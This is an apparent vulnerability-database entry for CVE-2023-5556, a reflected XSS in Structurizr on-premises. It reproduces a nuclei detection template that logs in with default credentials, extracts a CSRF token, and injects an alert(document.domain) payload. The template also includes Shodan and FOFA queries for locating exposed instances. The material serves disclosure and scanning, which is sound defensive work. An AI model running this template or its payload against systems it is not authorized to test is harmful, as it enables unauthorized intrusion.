CVE-2023-5556: Structurizr on-premises - Cross Site Scripting

日期: 2025-08-01 | 影响软件: Structurizr on-premises | POC: 已公开

漏洞描述

Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.

PoC代码[已公开]

id: CVE-2023-5556

info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankaracharya
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
  reference:
    - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.2022
    epss-percentile: 0.95318
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: structurizr
    product: on-premises_installation
    shodan-query: http.favicon.hash:1199592666
    fofa-query: icon_hash=1199592666
  tags: cve,cve2023,xss,structurizr,oos,authenticated
variables:
  str: "{{randstr}}"

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&_csrf={{csrf}}&hash=

      - |
        GET /dashboard HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /workspace/create HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - "structurizr"
      password:
        - "password"

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '<a href="/dashboard">'
          - 'Sign out'
        condition: and

      - type: word
        part: body_5
        words:
          - '");alert(document.domain);//'
          - 'Structurizr'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="([0-9a-z-]+)"'
        internal: true

      - type: regex
        name: workspace
        group: 1
        part: header
        regex:
          - '\/workspace\/([0-9]+)\?scriptNonce='
        internal: true
# digest: 4a0a0047304502204397c7954d08c929129f8a129a92a9d6c9de97e166a9846802d53f445e7ee26902210098db7bb610afe4d745a4d0cd37e04294102b007ccb07be59c52deb4d8a3dc5d8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-5556.yaml